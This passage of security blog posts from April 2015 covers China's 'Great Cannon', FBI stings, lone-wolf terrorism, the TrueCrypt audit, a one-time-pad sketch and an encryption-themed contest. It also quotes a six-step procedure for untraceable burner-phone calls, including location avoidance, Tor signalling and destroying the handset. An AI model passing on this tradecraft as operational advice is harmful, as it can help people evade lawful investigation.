The impact on our organizations and institutions will be profound. Governments, armies, churches, universities, banks and companies all evolved to thrive in a relatively murky epistemological environment, in which most knowledge was local, secrets were easily kept, and individuals were, if not blind, myopic. When these organizations suddenly find themselves exposed to daylight, they quickly discover that they can no longer rely on old methods; they must respond to the new transparency or go extinct. Just as a living cell needs an effective membrane to protect its internal machinery from the vicissitudes of the outside world, so human organizations need a protective interface between their internal affairs and the public world, and the old interfaces are losing their effectiveness.

Posted on April 14, 2015 at 6:32 AM

China's Great Cannon

Citizen Lab has issued a report on China’s “Great Cannon” attack tool, used in the recent DDoS attack against GitHub.

We show that, while the attack infrastructure is co-located with the Great Firewall, the attack was carried out by a separate offensive system, with different capabilities and design, that we term the “Great Cannon.” The Great Cannon is not simply an extension of the Great Firewall, but a distinct attack tool that hijacks traffic to (or presumably from) individual IP addresses, and can arbitrarily replace unencrypted content as a man-in-the-middle.

The operational deployment of the Great Cannon represents a significant escalation in state-level information control: the normalization of widespread use of an attack tool to enforce censorship by weaponizing users. Specifically, the Cannon manipulates the traffic of “bystander” systems outside China, silently programming their browsers to create a massive DDoS attack. While employed for a highly visible attack in this case, the Great Cannon clearly has the capability for use in a manner similar to the NSA’s QUANTUM system, affording China the opportunity to deliver exploits targeting any foreign computer that communicates with any China-based website not fully utilizing HTTPS.

It’s kind of hard for the US to complain about this kind of thing, since we do it too.

More stories. Hacker News thread.

Posted on April 13, 2015 at 9:12 AM

Alternatives to the FBI's Manufacturing of Terrorists

John Mueller suggests an alternative to the FBI’s practice of encouraging terrorists and then arresting them for something they would never have planned on their own:

The experience with another case can be taken to suggest that there could be an alternative, and far less costly, approach to dealing with would-be terrorists, one that might generally (but not always) be effective at stopping them without actually having to jail them.

It involves a hothead in Virginia who ranted about jihad on Facebook, bragging about how “we dropped the twin towers.” He then told a correspondent in New Orleans that he was going to bomb the Washington, D.C. Metro the next day. Not wanting to take any chances and not having the time to insinuate an informant, the FBI arrested him. Not surprisingly, they found no bomb materials in his possession. Since irresponsible bloviating is not illegal (if it were, Washington would quickly become severely underpopulated), the police could only charge him with a minor crime—making an interstate threat. He received only a good scare, a penalty of time served and two years of supervised release.

That approach seems to have worked: the guy seems never to have been heard from again. It resembles the Secret Service’s response when they get a tip that someone has ranted about killing the president. They do not insinuate an encouraging informant into the ranter’s company to eventually offer crucial, if bogus, facilitating assistance to the assassination plot. Instead, they pay the person a Meaningful Visit and find that this works rather well as a dissuasion device. Also, in the event of a presidential trip to the ranter’s vicinity, the ranter is visited again. It seems entirely possible that this approach could productively be applied more widely in terrorism cases. Ranting about killing the president may be about as predictive of violent action as ranting about the virtues of terrorism to deal with a political grievance. The terrorism cases are populated by many such ranters—indeed, tips about their railing have frequently led to FBI involvement. It seems likely, as apparently happened in the Metro case, that the ranter could often be productively deflected by an open visit from the police indicating that they are on to him. By contrast, sending in a paid operative to worm his way into the ranter’s confidence may have the opposite result, encouraging, even gulling, him toward violence.

Posted on April 10, 2015 at 10:33 AM

Lone-Wolf Terrorism

The Southern Poverty Law Center warns of the rise of lone-wolf terrorism.

From a security perspective, lone wolves are much harder to prevent because there is no conspiracy to detect.

The long-term trend away from violence planned and committed by groups and toward lone wolf terrorism is a worrying one. Authorities have had far more success penetrating plots concocted by several people than individuals who act on their own. Indeed, the lone wolf’s chief asset is the fact that no one else knows of his plans for violence and they are therefore exceedingly difficult to disrupt.

[…]

The temptation to focus on horrific groups like Al Qaeda and the Islamic State is wholly understandable. And the federal government recently has taken steps to address the terrorist threat more comprehensively, with Attorney General Eric Holder announcing the coming reconstitution of the Domestic Terrorism Executive Committee. There has been a recent increase in funding for studies of terrorism and radicalization, and the FBI has produced a number of informative reports.

And Holder seems to understand clearly that lone wolves and small cells are an increasing threat. “It’s something that frankly keeps me up at night, worrying about the lone wolf or a group of people, a very small group of people, who decide to get arms on their own and do what we saw in France,” he said recently.

Jim Harper of the Cato Institute wrote about this in 2009 after the Fort Hood shooting.

Posted on April 8, 2015 at 10:15 AM

Cell Phone Opsec

Here’s an article on making secret phone calls with cell phones.

His step-by-step instructions for making a clandestine phone call are as follows:

  1. Analyze your daily movements, paying special attention to anchor points (basis of operation like home or work) and dormant periods in schedules (8-12 p.m. or when cell phones aren’t changing locations);
  2. Leave your daily cell phone behind during dormant periods and purchase a prepaid no-contract cell phone (“burner phone”);
  3. After storing burner phone in a Faraday bag, activate it using a clean computer connected to a public Wi-Fi network;
  4. Encrypt the cell phone number using a onetime pad (OTP) system and rename an image file with the encrypted code. Using Tor to hide your web traffic, post the image to an agreed upon anonymous Twitter account, which signals a communications request to your partner;
  5. Leave cell phone behind, avoid anchor points, and receive phone call from partner on burner phone at 9:30 p.m.—or another pre-arranged “dormant” time—on the following day;
  6. Wipe down and destroy handset.

Note that it actually makes sense to use a one-time pad in this instance. The message is a ten-digit number, and a one-time pad is easier, faster, and cleaner than using any computer encryption program.
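The arithmetic behind a pencil-and-paper pad for a ten-digit number is simple enough to sketch. A minimal illustration (the function names and the sample phone number are mine, not from the article): add a pre-shared random digit to each position of the number, mod 10, and subtract to decrypt. The pad must be truly random, shared in advance, and never reused.

```python
import secrets


def make_pad(n=10):
    """Generate a pad of n random decimal digits (the pre-shared secret)."""
    return [secrets.randbelow(10) for _ in range(n)]


def otp_encrypt(number, pad):
    """Encrypt a string of decimal digits by digit-wise addition mod 10."""
    return "".join(str((int(d) + k) % 10) for d, k in zip(number, pad))


def otp_decrypt(cipher, pad):
    """Decrypt by digit-wise subtraction mod 10 with the same pad."""
    return "".join(str((int(d) - k) % 10) for d, k in zip(cipher, pad))


# Example with a made-up burner number; round-trips back to the plaintext.
pad = make_pad()
cipher = otp_encrypt("5550123456", pad)
assert otp_decrypt(cipher, pad) == "5550123456"
```

Because each ciphertext digit is a plaintext digit shifted by an independent random amount, every ten-digit number is equally likely given the ciphertext—which is why a one-time pad is information-theoretically secure for a message this short, and why doing it by hand beats involving a computer at all.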

Posted on April 7, 2015 at 9:27 AM

TrueCrypt Security Audit Completed

The security audit of the TrueCrypt code has been completed (see here for the first phase of the audit), and the results are good. Some issues were found, but nothing major.

From Matthew Green, who is leading the project:

The TL;DR is that based on this audit, Truecrypt appears to be a relatively well-designed piece of crypto software. The NCC audit found no evidence of deliberate backdoors, or any severe design flaws that will make the software insecure in most instances.

That doesn’t mean Truecrypt is perfect. The auditors did find a few glitches and some incautious programming—leading to a couple of issues that could, in the right circumstances, cause Truecrypt to give less assurance than we’d like it to.

Nothing that would make me not use the program, though.

Slashdot thread.

Posted on April 3, 2015 at 1:14 PM

The Eighth Movie-Plot Threat Contest

It’s April 1, and time for another Movie-Plot Threat Contest. This year, the theme is Crypto Wars II. Strong encryption is evil, because it prevents the police from solving crimes. (No, really—that’s the argument.) FBI Director James Comey is going to be hard to beat with his heartfelt litany of movie-plot threats:

“We’re drifting toward a place where a whole lot of people are going to be looking at us with tears in their eyes,” Comey argued, “and say ‘What do you mean you can’t? My daughter is missing. You have her phone. What do you mean you can’t tell me who she was texting with before she disappeared?’”

[…]

“I’ve heard tech executives say privacy should be the paramount virtue,” Comey said. “When I hear that, I close my eyes and say, ‘Try to imagine what that world looks like where pedophiles can’t be seen, kidnappers can’t be seen, drug dealers can’t be seen.'”

(More Comey here.)

Come on, Comey. You might be able to scare noobs like Rep. John Carter with that talk, but you’re going to have to do better if you want to win this contest. We heard this same sort of stuff out of then-FBI director Louis Freeh in 1996 and 1997.

This is the contest: I want a movie-plot threat that shows the evils of encryption. (For those who don’t know, a movie-plot threat is a scary-threat story that would make a great movie, but is much too specific to build security policies around. Contest history here.) We’ve long heard about the evils of the Four Horsemen of the Internet Apocalypse—terrorists, drug dealers, kidnappers, and child pornographers. (Or maybe they’re terrorists, pedophiles, drug dealers, and money launderers; I can never remember.) Try to be more original than that. And nothing too science fictional; today’s technology or presumed technology only.

Entries are limited to 500 words—I check—and should be posted in the comments. At the end of the month, I’ll choose five or so semifinalists, and we can all vote and pick the winner.

The prize will be signed copies of the 20th Anniversary Edition of the 2nd Edition of Applied Cryptography, and the 15th Anniversary Edition of Secrets and Lies, both being published by Wiley this year in an attempt to ride the Data and Goliath bandwagon.

Good luck.

Posted on April 1, 2015 at 6:33 AM
